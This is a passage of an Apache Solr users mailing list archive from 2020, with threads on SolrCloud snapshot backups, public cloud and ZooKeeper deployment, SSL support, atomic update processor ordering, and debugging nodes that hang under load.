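        + "&commitName=mySnapshot&location=/backups&name=mycollection_shard1");
    // 8. Clean up the snapshot afterwards
    get(BASE + "/admin/collections?action=DELETESNAPSHOT&collection=mycollection&commitName=mySnapshot");
  }

  static void get(String url) throws Exception {
    HttpResponse<String> rsp = HTTP.send(
        HttpRequest.newBuilder(URI.create(url)).GET().build(),
        HttpResponse.BodyHandlers.ofString());
    System.out.println(rsp.statusCode() + " <- " + url);
  }
}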


This seems ... too good to be true? I've seen so many threads about how
hard it is to create backups in SolrCloud on this mailing list over the
years, but this seems pretty straightforward? Am I missing some
glaringly obvious reason why this will fail catastrophically?

Using Solr 7.7 in this case.

Feedback much appreciated!

Thanks,

 - Bram


Re: SolrCloud on PublicCloud

2020-08-03 Thread Shawn Heisey

On 8/3/2020 12:04 PM, Mathew Mathew wrote:

Have been looking for architectural guidance on correctly configuring SolrCloud 
on Public Cloud (eg Azure/AWS)
In particular the zookeeper based autoscaling seems to overlap with the auto 
scaling capabilities of cloud platforms.

I have the following questions.

   1.  Should the ZooKeeper ensable be put in a autoscaling group. This seems 
to be a no, since the SolrNodes need to register against a static list of 
Zookeeper ips.


Correct.  There are features in ZK 3.5 for dynamic server membership, 
but in general it is better to have a static list.  The client must be 
upgraded as well for that feature to work.  The ZK client was upgraded 
to a 3.5 version in Solr 8.2.0.  I don't think we have done any testing 
of the dynamic membership feature.


ZK is generally best set up with either 3 or 5 servers, depending on the 
level of redundancy desired, and left alone unless there's a problem. 
With 3 servers, the ensemble can survive the failure of 1 server.  With 
5, it can survive the failure of 2.  As far as I know, getting back to 
full redundancy is best handled as a manual process, even if running 
version 3.5.



   2.  Should the SolrNodes be put in a AutoScaling group? Or should we just 
launch/register SolrNodes using a lambda function/Azure function.


That really depends on what you're doing.  There is no "one size fits 
most" configuration.


I personally would avoid setting things up in a way that results in Solr 
nodes automatically being added or removed.  Adding a node will 
generally result in a LOT of data being copied, and that can impact 
performance in a major way, so adding nodes should be scheduled to 
minimize impact.  If it's automatic in response to high load, adding a 
node can make performance a lot worse before it gets better.  When a 
node disappears, manual action is required for SolrCloud to forget the node.



   3.  Should the SolrNodes be associated with local storage or should they be 
attached to shared storage volumes.


Lucene (which provides most of Solr's functionality) generally does not 
like to work with shared storage.  In addition to potential latency 
issues for storage connected via a network, Lucene works extremely hard 
to ensure that only one process can open an index.  Using shared storage 
will encourage attempts to share the index directory between multiple 
processes, which almost always fails to work.


Things work best with locally attached storage utilizing an extremely 
fast connection method (like SATA or SCSI), and a locally handled 
filesystem.  Lucene uses some pretty involved file locking mechanisms, 
which often do not work well on remote or shared filesystems.


---

We (the developers that build this software) generally have a very 
near-sighted view of things, not really caring about details like the 
hardware deployment.  That probably needs to change a little bit, 
particularly when it comes to documentation.


Thanks,
Shawn


SolrCloud on PublicCloud

2020-08-03 Thread Mathew Mathew
Have been looking for architectural guidance on correctly configuring SolrCloud 
on Public Cloud (eg Azure/AWS)
In particular the zookeeper based autoscaling seems to overlap with the auto 
scaling capabilities of cloud platforms.

I have the following questions.

  1.  Should the ZooKeeper ensemble be put in an autoscaling group? This seems to
be a no, since the SolrNodes need to register against a static list of
ZooKeeper IPs.
  2.  Should the SolrNodes be put in an AutoScaling group? Or should we just
launch/register SolrNodes using a Lambda function/Azure function?
  3.  Should the SolrNodes be associated with local storage, or should they be
attached to shared storage volumes?

It seems like this would be a solved problem with established patterns; however, I
could not find any documentation on it.
I'd appreciate insights from those who have been here before.

Thanks,

Mathew
This email and the information contained herein is proprietary and confidential 
and subject to the Amdocs Email Terms of Service, which you may review at 
https://www.amdocs.com/about/email-terms-of-service 
<https://www.amdocs.com/about/email-terms-of-service>


SolrCloud SSL Encryption

2020-08-03 Thread Mathew Mathew
According to the documentation.

https://lucene.apache.org/solr/guide/8_6/enabling-ssl.html

ZooKeeper does not support encrypted communication with clients like Solr. 
There are several related JIRA tickets where SSL support is being 
planned/worked on: 
ZOOKEEPER-235; 
ZOOKEEPER-236; 
ZOOKEEPER-1000; and 
ZOOKEEPER-2120.

However, three of those linked tickets are closed. I'm wondering whether there is a
more recent update on this, and whether it is now possible to encrypt traffic between
Solr and ZooKeeper.


Thanks,

Mathew

This email and the information contained herein is proprietary and confidential 
and subject to the Amdocs Email Terms of Service, which you may review at 
https://www.amdocs.com/about/email-terms-of-service 



Re: AtomicUpdate on SolrCloud is not working

2020-07-20 Thread Shawn Heisey

On 7/19/2020 1:37 AM, yo tomi wrote:

I have no choice but use post-processor.
However bug of SOLR-8030 makes me not feel like using it.


Can you explain why you need the trim field and remove blank field 
processors to be post processors?  When I think about these 
functionalities, they should work fully as expected even when executed 
as "pre" processors.


Thanks,
Shawn


Re: AtomicUpdate on SolrCloud is not working

2020-07-19 Thread yo tomi
Hi Jörn & Shawn,
"does not work properly" means that the pre-processors
(TrimFieldUpdateProcessorFactory and
RemoveBlankFieldUpdateProcessorFactory) don't trim values or remove blanks for
string fields.

example:

When the following schema:
---
  
  
---

update following documents with "Documents" of solr admin:
---
{
"id": "1",
"title": {"set": " test "}
},
{
"id": "2",
"title": {set": ""}
}
---

Then the follows are indexed, when pre-processor:
---
{
"id": "1",
"title": " test "
},
{
"id": "2",
"title": ""
}
---

When post-processor:
---
{
"id": "1",
"title": "test"
},
{
"id": "2"
}
---
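
For reference, the same atomic update can also be sent from SolrJ with something
like this (the collection name is made up):

import java.util.Collections;

import org.apache.solr.client.solrj.impl.HttpSolrClient;
import org.apache.solr.common.SolrInputDocument;

public class AtomicUpdateExample {
  public static void main(String[] args) throws Exception {
    try (HttpSolrClient solr = new HttpSolrClient.Builder("http://localhost:8983/solr").build()) {
      SolrInputDocument doc = new SolrInputDocument();
      doc.addField("id", "1");
      // Atomic "set" with surrounding whitespace, to see whether the trim processor runs
      doc.addField("title", Collections.singletonMap("set", " test "));
      solr.add("mycollection", doc);
      solr.commit("mycollection");
    }
  }
}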

I have no choice but to use the post-processor configuration.
However, the bug in SOLR-8030 makes me reluctant to use it.

By the way, the Solr version is 8.4.

Best,
Yoshiaki


Re: AtomicUpdate on SolrCloud is not working

2020-07-18 Thread Shawn Heisey

On 7/17/2020 1:32 AM, yo tomi wrote:

When I did AtomicUpdate on SolrCloud by the following setting, it does
not work properly.


As Jörn Franke already mentioned, you haven't said exactly what "does 
not work properly" actually means in your situation.  Without that 
information, it will be very difficult to provide any real help.


Atomic update functionality is currently implemented in 
DistributedUpdateProcessorFactory.



---

  
  
  
  
  

---
When changed as follows and made it work, it became as expected.
---

  
  
  
  

---


The effective result difference between these configurations is that 
atomic updates will happen first with the first config, and in the 
second, atomic updates will happen second to last -- just before 
RunUpdateProcessorFactory.


Also, with the first config, most of the update processors are going to 
be executed on the machine with the shard leader (after the update is 
distributed) and if there is more than one NRT replica, they will be 
executed multiple times.  With the second config, most of the processors 
will be executed on the machine that actually receives the update 
request.  For the purposes of that discussion, remember that when a PULL 
replica is elected leader, it is effectively an NRT replica.


Does that information help you determine why it doesn't do what you expect?


The later setting and the way of using post-processor could make the
same result, I though,
but using post-processor, bug of SOLR-8030 makes me not feel like using it.
By the latter setting even, is there any possibility of SOLR-8030 to
become?


See this part of the reference guide for a bunch of gory details about 
DistributedUpdateProcessorFactory:


https://cwiki.apache.org/confluence/display/SOLR/UpdateRequestProcessor#UpdateRequestProcessor-DistributedUpdates

In SOLR-8030, the general consensus among committers is that you should 
configure almost all update processors as "pre" processors -- placed 
before DistributedUpdatePorcessorFactory in the config.  When done this 
way, updates are usually faster and less likely to yield inconsistent 
results.


There may be situations where having them as "post" processors is 
correct, but that won't happen very often.  The second config above does 
implicitly use "pre" for most of the processors.


Thanks,
Shawn


Re: AtomicUpdate on SolrCloud is not working

2020-07-17 Thread Issei Nishigata
I have the same problem in my Solr 8.
I think it's because, in the first way,
TrimFieldUpdateProcessorFactory and RemoveBlankFieldUpdateProcessorFactory
are not taking effect.

On SolrCloud, TrimFieldUpdateProcessorFactory,
RemoveBlankFieldUpdateProcessorFactory and other processors
only run on the first node that receives an update request.
Consequently, it's necessary to execute TrimFieldUpdateProcessorFactory and
RemoveBlankFieldUpdateProcessorFactory
after the document has been handed to the replica nodes by the
DistributedUpdateProcessor,
so we need to use the second way he described; otherwise it won't
operate properly.

But even with this approach, both he and I are worried that it may trigger
SOLR-8030.
I would also like to know about this; does anyone have any comments?


Best,
Issei

2020年7月17日(金) 18:34 Jörn Franke :

> What does „not work correctly mean“?
>
> Have you checked that all fields are stored or doc values?
>
> > Am 17.07.2020 um 11:26 schrieb yo tomi :
> >
> > Hi All
> >
> > Sorry, above settings are contrary with each other.
> > Actually, following setting does not work properly.
> > ---
> > 
> > 
> > 
> > 
> > 
> > 
> > ---
> > And follows is working as expected.
> > ---
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > ---
> >
> > Thanks,
> > Yoshiaki
> >
> >
> > 2020年7月17日(金) 16:32 yo tomi :
> >
> >> Hi, All
> >> When I did AtomicUpdate on SolrCloud by the following setting, it does
> not work properly.
> >>
> >> ---
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> ---
> >> When changed as follows and made it work, it became as expected.
> >> ---
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> ---
> >> The later setting and the way of using post-processor could make the
> same result, I though,
> >> but using post-processor, bug of SOLR-8030 makes me not feel like using
> it.
> >> By the latter setting even, is there any possibility of SOLR-8030 to
> become? Seeing the source code, tlog which is from leader comes to Replica
> seems to be processed correctly with UpdateRequestProcessor,
> >> the latter setting had not been the right one for the bug, I
> though.Anyone knows the most appropriate way to configure AtomicUpdate on
> SolrCloud?
> >>
> >> Thanks,
> >> Yoshiaki
> >>
> >>
>


Re: AtomicUpdate on SolrCloud is not working

2020-07-17 Thread Jörn Franke
What does „not work correctly“ mean?

Have you checked that all fields are stored or doc values?

> Am 17.07.2020 um 11:26 schrieb yo tomi :
> 
> Hi All
> 
> Sorry, above settings are contrary with each other.
> Actually, following setting does not work properly.
> ---
> 
> 
> 
> 
> 
> 
> ---
> And follows is working as expected.
> ---
> 
> 
> 
> 
> 
> 
> 
> ---
> 
> Thanks,
> Yoshiaki
> 
> 
> 2020年7月17日(金) 16:32 yo tomi :
> 
>> Hi, All
>> When I did AtomicUpdate on SolrCloud by the following setting, it does not 
>> work properly.
>> 
>> ---
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> ---
>> When changed as follows and made it work, it became as expected.
>> ---
>> 
>> 
>> 
>> 
>> 
>> 
>> ---
>> The later setting and the way of using post-processor could make the same 
>> result, I though,
>> but using post-processor, bug of SOLR-8030 makes me not feel like using it.
>> By the latter setting even, is there any possibility of SOLR-8030 to become? 
>> Seeing the source code, tlog which is from leader comes to Replica seems to 
>> be processed correctly with UpdateRequestProcessor,
>> the latter setting had not been the right one for the bug, I though.Anyone 
>> knows the most appropriate way to configure AtomicUpdate on SolrCloud?
>> 
>> Thanks,
>> Yoshiaki
>> 
>> 


Re: AtomicUpdate on SolrCloud is not working

2020-07-17 Thread yo tomi
Hi All

Sorry, the two settings above were swapped with each other.
Actually, the following setting does not work properly.
---

 
 
 
 

---
And the following works as expected.
---

 
 
 
 
 

---

Thanks,
Yoshiaki


2020年7月17日(金) 16:32 yo tomi :

> Hi, All
> When I did AtomicUpdate on SolrCloud by the following setting, it does not 
> work properly.
>
> ---
> 
>  
>  
>  
>  
>  
> 
> ---
> When changed as follows and made it work, it became as expected.
> ---
> 
>  
>  
>  
>  
> 
> ---
> The later setting and the way of using post-processor could make the same 
> result, I though,
> but using post-processor, bug of SOLR-8030 makes me not feel like using it.
> By the latter setting even, is there any possibility of SOLR-8030 to become? 
> Seeing the source code, tlog which is from leader comes to Replica seems to 
> be processed correctly with UpdateRequestProcessor,
> the latter setting had not been the right one for the bug, I though.Anyone 
> knows the most appropriate way to configure AtomicUpdate on SolrCloud?
>
> Thanks,
> Yoshiaki
>
>


AtomicUpdate on SolrCloud is not working

2020-07-17 Thread yo tomi
Hi, All
When I did an atomic update on SolrCloud with the following setting, it did
not work properly.

---

 
 
 
 
 

---
When I changed it as follows, it worked as expected.
---

 
 
 
 

---
The latter setting and the approach of using post-processors could produce
the same result, I thought,
but with post-processors, the bug in SOLR-8030 makes me reluctant to use them.
Even with the latter setting, is there any possibility that SOLR-8030 will
occur? Looking at the source code, the tlog that comes from the leader to the
replica seems to be processed correctly by the UpdateRequestProcessor, so I
thought the latter setting might not be the one affected by the bug.
Does anyone know the most appropriate way to configure atomic updates
on SolrCloud?

Thanks,
Yoshiaki


Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Tran Van Hoan
 
* The total thread count is 25.6k when Solr hangs.
On Sunday, July 5, 2020, 2:55:26 AM GMT+7, Tran Van Hoan 
 wrote:  
 
All servers only run Solr, ZooKeeper, and exporters (node-exporter,
process-exporter, solr-exporter, zoo-exporter).
- Network: no packet loss, no TCP issues before the incident; TCP drops of around
100-200/s during the incident and an overflow of ~100 in somaxconn.
- Total available memory is greater than 25G (Solr's Xmx = 30G).
- CPU < 10%, no high load average (5, 15), except when Solr hangs, when the load
average is high.
- Normally the total process count is around ~2k; when the incident occurs, the
total thread count is 25.6 (Solr is out of the cluster but still running).
- Low TCP conntrack.
- Swappiness = 0 and no swap in use.
- The SolrCloud has 2 collections; only one collection goes down when nodes go
down (the remaining collection is still green).

On Sunday, July 5, 2020, 1:30:59 AM GMT+7, Rodrigo Oliveira 
 wrote:  
 
 Network it's ok? Between nodes? The use? Swap it's disabled? Swapiness rhe
value it's 0?

Em sáb, 4 de jul de 2020 15:19, Tran Van Hoan
 escreveu:

>  I used physical servers, and IO wait is small :(!!!I saw that iptables
> dropped all ACK message from clients (not only client solr, prometheus
> scape metric from exporter was dropped too).all when i check netstat
> -anp|grep 8983, all socket are TIME_WAIT state.Only restart solrs, the
> incident was resolved. Total request around 2.5k request per second per
> node.
>
>    On Sunday, July 5, 2020, 1:11:38 AM GMT+7, Rodrigo Oliveira <
> adamantina.rodr...@gmail.com> wrote:
>
>  Hi,
>
> I had this problem. In my case was the wait/io in vm. I migrate my
> environment to another place and solved.
>
> Actually it's problem wirh wait/io at host physical (until backup it's a
> problem over veeam).
>
> Regards
>
> Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
>  escreveu:
>
> > The problem reoccurs repeatly in recent days.
> > To day i tried dump heap and thread. Only dumping thread, heap can not
> > because solr instance was hang.
> > Almost thread was blocked.
> >
> > On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
> >  wrote:
> >
> >
> > I checked node exporter metrics and saw network no problem
> >
> > On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> > tranvanhoan...@yahoo.com> wrote:
> >
> >
> > I check node exporter, no problem with OS, hardware and network.
> > I attached images about solr metrics 7 days and 12h.
> >
> > On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> > dario.rigo...@comperio.it> wrote:
> >
> >
> > What about a network issue?
> >
> > Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
> >  ha scritto:
> >
> >
> > >
> > > dear all,
> > >
> > >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > > instance has xmx = xms = 30G.
> > >
> > > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One
> node
> > > were down. almost metrics didn't increase too much except threads.
> > >
> > > Performance in one week ago:
> > >
> > > performace 12h ago:
> > >
> > > I go to the admin UI, some node dead some node too long to response.
> When
> > > checking logfile, they generate too much (log level warning), here are
> > logs
> > > which appears in the solr cloud:
> > >
> > > Log before server 4 and 6 down
> > >
> > > - Server 4 before it dead:
> > >
> > >    + o.a.s.h.RequestHandlerBase java.io.IOException:
> > > java.util.concurrent.TimeoutException: Idle timeout expired:
> > 12/12
> > > ms
> > >
> > >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Tran Van Hoan
All servers only run Solr, ZooKeeper, and exporters (node-exporter,
process-exporter, solr-exporter, zoo-exporter).
- Network: no packet loss, no TCP issues before the incident; TCP drops of around
100-200/s during the incident and an overflow of ~100 in somaxconn.
- Total available memory is greater than 25G (Solr's Xmx = 30G).
- CPU < 10%, no high load average (5, 15), except when Solr hangs, when the load
average is high.
- Normally the total process count is around ~2k; when the incident occurs, the
total thread count is 25.6 (Solr is out of the cluster but still running).
- Low TCP conntrack.
- Swappiness = 0 and no swap in use.
- The SolrCloud has 2 collections; only one collection goes down when nodes go
down (the remaining collection is still green).

On Sunday, July 5, 2020, 1:30:59 AM GMT+7, Rodrigo Oliveira 
 wrote:  
 
 Network it's ok? Between nodes? The use? Swap it's disabled? Swapiness rhe
value it's 0?

Em sáb, 4 de jul de 2020 15:19, Tran Van Hoan
 escreveu:

>  I used physical servers, and IO wait is small :(!!!I saw that iptables
> dropped all ACK message from clients (not only client solr, prometheus
> scape metric from exporter was dropped too).all when i check netstat
> -anp|grep 8983, all socket are TIME_WAIT state.Only restart solrs, the
> incident was resolved. Total request around 2.5k request per second per
> node.
>
>    On Sunday, July 5, 2020, 1:11:38 AM GMT+7, Rodrigo Oliveira <
> adamantina.rodr...@gmail.com> wrote:
>
>  Hi,
>
> I had this problem. In my case was the wait/io in vm. I migrate my
> environment to another place and solved.
>
> Actually it's problem wirh wait/io at host physical (until backup it's a
> problem over veeam).
>
> Regards
>
> Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
>  escreveu:
>
> > The problem reoccurs repeatly in recent days.
> > To day i tried dump heap and thread. Only dumping thread, heap can not
> > because solr instance was hang.
> > Almost thread was blocked.
> >
> > On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
> >  wrote:
> >
> >
> > I checked node exporter metrics and saw network no problem
> >
> > On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> > tranvanhoan...@yahoo.com> wrote:
> >
> >
> > I check node exporter, no problem with OS, hardware and network.
> > I attached images about solr metrics 7 days and 12h.
> >
> > On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> > dario.rigo...@comperio.it> wrote:
> >
> >
> > What about a network issue?
> >
> > Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
> >  ha scritto:
> >
> >
> > >
> > > dear all,
> > >
> > >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > > instance has xmx = xms = 30G.
> > >
> > > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One
> node
> > > were down. almost metrics didn't increase too much except threads.
> > >
> > > Performance in one week ago:
> > >
> > > performace 12h ago:
> > >
> > > I go to the admin UI, some node dead some node too long to response.
> When
> > > checking logfile, they generate too much (log level warning), here are
> > logs
> > > which appears in the solr cloud:
> > >
> > > Log before server 4 and 6 down
> > >
> > > - Server 4 before it dead:
> > >
> > >    + o.a.s.h.RequestHandlerBase java.io.IOException:
> > > java.util.concurrent.TimeoutException: Idle timeout expired:
> > 12/12
> > > ms
> > >
> > >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured
> while
> > > waiting response from server at:
> > > http://server6:8983/solr/mycollection_shard

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Rodrigo Oliveira
Is the network OK between the nodes? What about usage? Is swap disabled? Is
swappiness set to 0?

Em sáb, 4 de jul de 2020 15:19, Tran Van Hoan
 escreveu:

>  I used physical servers, and IO wait is small :(!!!I saw that iptables
> dropped all ACK message from clients (not only client solr, prometheus
> scape metric from exporter was dropped too).all when i check netstat
> -anp|grep 8983, all socket are TIME_WAIT state.Only restart solrs, the
> incident was resolved. Total request around 2.5k request per second per
> node.
>
> On Sunday, July 5, 2020, 1:11:38 AM GMT+7, Rodrigo Oliveira <
> adamantina.rodr...@gmail.com> wrote:
>
>  Hi,
>
> I had this problem. In my case was the wait/io in vm. I migrate my
> environment to another place and solved.
>
> Actually it's problem wirh wait/io at host physical (until backup it's a
> problem over veeam).
>
> Regards
>
> Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
>  escreveu:
>
> > The problem reoccurs repeatly in recent days.
> > To day i tried dump heap and thread. Only dumping thread, heap can not
> > because solr instance was hang.
> > Almost thread was blocked.
> >
> > On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
> >  wrote:
> >
> >
> > I checked node exporter metrics and saw network no problem
> >
> > On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> > tranvanhoan...@yahoo.com> wrote:
> >
> >
> > I check node exporter, no problem with OS, hardware and network.
> > I attached images about solr metrics 7 days and 12h.
> >
> > On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> > dario.rigo...@comperio.it> wrote:
> >
> >
> > What about a network issue?
> >
> > Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
> >  ha scritto:
> >
> >
> > >
> > > dear all,
> > >
> > >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > > instance has xmx = xms = 30G.
> > >
> > > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One
> node
> > > were down. almost metrics didn't increase too much except threads.
> > >
> > > Performance in one week ago:
> > >
> > > performace 12h ago:
> > >
> > > I go to the admin UI, some node dead some node too long to response.
> When
> > > checking logfile, they generate too much (log level warning), here are
> > logs
> > > which appears in the solr cloud:
> > >
> > > Log before server 4 and 6 down
> > >
> > > - Server 4 before it dead:
> > >
> > >+ o.a.s.h.RequestHandlerBase java.io.IOException:
> > > java.util.concurrent.TimeoutException: Idle timeout expired:
> > 12/12
> > > ms
> > >
> > >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured
> while
> > > waiting response from server at:
> > > http://server6:8983/solr/mycollection_shard3_replica_n5/select
> > >
> > >
> > >
> > > at
> > >
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:406)
> > >
> > >at
> > >
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:746)
> > >
> > >at
> > > org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1274)
> > >
> > >at
> > >
> >
> org.apache.solr.handler.component.HttpShardHandler.request(HttpShardHandler.java:238)
> > >
> > >at
> > >
> >
> org.apache.solr.handler.component.HttpShar

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Tran Van Hoan
I used physical servers, and IO wait is small :(!!! I saw that iptables dropped
all ACK messages from clients (not only Solr clients; Prometheus scrape requests
to the exporters were dropped too). When I check netstat -anp | grep 8983, all
sockets are in the TIME_WAIT state. Only restarting the Solr instances resolved the
incident. Total requests are around 2.5k per second per node.

On Sunday, July 5, 2020, 1:11:38 AM GMT+7, Rodrigo Oliveira 
 wrote:  
 
 Hi,

I had this problem. In my case was the wait/io in vm. I migrate my
environment to another place and solved.

Actually it's problem wirh wait/io at host physical (until backup it's a
problem over veeam).

Regards

Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
 escreveu:

> The problem reoccurs repeatly in recent days.
> To day i tried dump heap and thread. Only dumping thread, heap can not
> because solr instance was hang.
> Almost thread was blocked.
>
> On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
>  wrote:
>
>
> I checked node exporter metrics and saw network no problem
>
> On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> tranvanhoan...@yahoo.com> wrote:
>
>
> I check node exporter, no problem with OS, hardware and network.
> I attached images about solr metrics 7 days and 12h.
>
> On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> dario.rigo...@comperio.it> wrote:
>
>
> What about a network issue?
>
> Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
>  ha scritto:
>
>
> >
> > dear all,
> >
> >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > instance has xmx = xms = 30G.
> >
> > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One node
> > were down. almost metrics didn't increase too much except threads.
> >
> > Performance in one week ago:
> >
> > performace 12h ago:
> >
> > I go to the admin UI, some node dead some node too long to response. When
> > checking logfile, they generate too much (log level warning), here are
> logs
> > which appears in the solr cloud:
> >
> > Log before server 4 and 6 down
> >
> > - Server 4 before it dead:
> >
> >    + o.a.s.h.RequestHandlerBase java.io.IOException:
> > java.util.concurrent.TimeoutException: Idle timeout expired:
> 12/12
> > ms
> >
> >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured while
> > waiting response from server at:
> > http://server6:8983/solr/mycollection_shard3_replica_n5/select
> >
> >
> >
> > at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:406)
> >
> >                at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:746)
> >
> >                at
> > org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1274)
> >
> >                at
> >
> org.apache.solr.handler.component.HttpShardHandler.request(HttpShardHandler.java:238)
> >
> >                at
> >
> org.apache.solr.handler.component.HttpShardHandler.lambda$submit$0(HttpShardHandler.java:199)
> >
> >                at
> java.util.concurrent.FutureTask.run(FutureTask.java:266)
> >
> >                at
> > java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
> >
> >                at
> java.util.concurrent.FutureTask.run(FutureTask.java:266)
> >
> >                at
> >
> com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:181)
> >
> >                at
> >
> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:209)
> >
> >                at
> >
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
> >
> >                at
> >
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
> >
> >                ... 1 more
> 

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Rodrigo Oliveira
Hi,

I had this problem. In my case it was wait/IO in the VM. I migrated my
environment to another place and that solved it.

Actually it's a problem with wait/IO at the physical host (even backups over
Veeam are a problem).

Regards

Em sáb, 4 de jul de 2020 12:30, Tran Van Hoan
 escreveu:

> The problem reoccurs repeatly in recent days.
> To day i tried dump heap and thread. Only dumping thread, heap can not
> because solr instance was hang.
> Almost thread was blocked.
>
> On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan
>  wrote:
>
>
> I checked node exporter metrics and saw network no problem
>
> On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan <
> tranvanhoan...@yahoo.com> wrote:
>
>
> I check node exporter, no problem with OS, hardware and network.
> I attached images about solr metrics 7 days and 12h.
>
> On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin <
> dario.rigo...@comperio.it> wrote:
>
>
> What about a network issue?
>
> Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
>  ha scritto:
>
>
> >
> > dear all,
> >
> >  I have a solr cloud 8.2.0 with 6 instance per 6 server (64G RAM), each
> > instance has xmx = xms = 30G.
> >
> > Today almost nodes in the solrcloud were dead 2 times from 8:00AM (5/6
> > nodes were down) and 1:00PM (2/6 nodes  were down). yesterday,  One node
> > were down. almost metrics didn't increase too much except threads.
> >
> > Performance in one week ago:
> >
> > performace 12h ago:
> >
> > I go to the admin UI, some node dead some node too long to response. When
> > checking logfile, they generate too much (log level warning), here are
> logs
> > which appears in the solr cloud:
> >
> > Log before server 4 and 6 down
> >
> > - Server 4 before it dead:
> >
> >+ o.a.s.h.RequestHandlerBase java.io.IOException:
> > java.util.concurrent.TimeoutException: Idle timeout expired:
> 12/12
> > ms
> >
> >  +org.apache.solr.client.solrj.SolrServerException: Timeout occured while
> > waiting response from server at:
> > http://server6:8983/solr/mycollection_shard3_replica_n5/select
> >
> >
> >
> > at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:406)
> >
> >at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:746)
> >
> >at
> > org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1274)
> >
> >at
> >
> org.apache.solr.handler.component.HttpShardHandler.request(HttpShardHandler.java:238)
> >
> >at
> >
> org.apache.solr.handler.component.HttpShardHandler.lambda$submit$0(HttpShardHandler.java:199)
> >
> >at
> java.util.concurrent.FutureTask.run(FutureTask.java:266)
> >
> >at
> > java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
> >
> >at
> java.util.concurrent.FutureTask.run(FutureTask.java:266)
> >
> >at
> >
> com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:181)
> >
> >at
> >
> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:209)
> >
> >at
> >
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
> >
> >at
> >
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
> >
> >... 1 more
> >
> > Caused by: java.util.concurrent.TimeoutException
> >
> >at
> >
> org.eclipse.jetty.client.util.InputStreamResponseListener.get(InputStreamResponseListener.java:216)
> >
> >at
> >
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:397)
> >
> >... 12 more
> >
> >
> >
> &

Re: Almost nodes in Solrcloud dead suddently

2020-07-04 Thread Tran Van Hoan
The problem has recurred repeatedly in recent days.
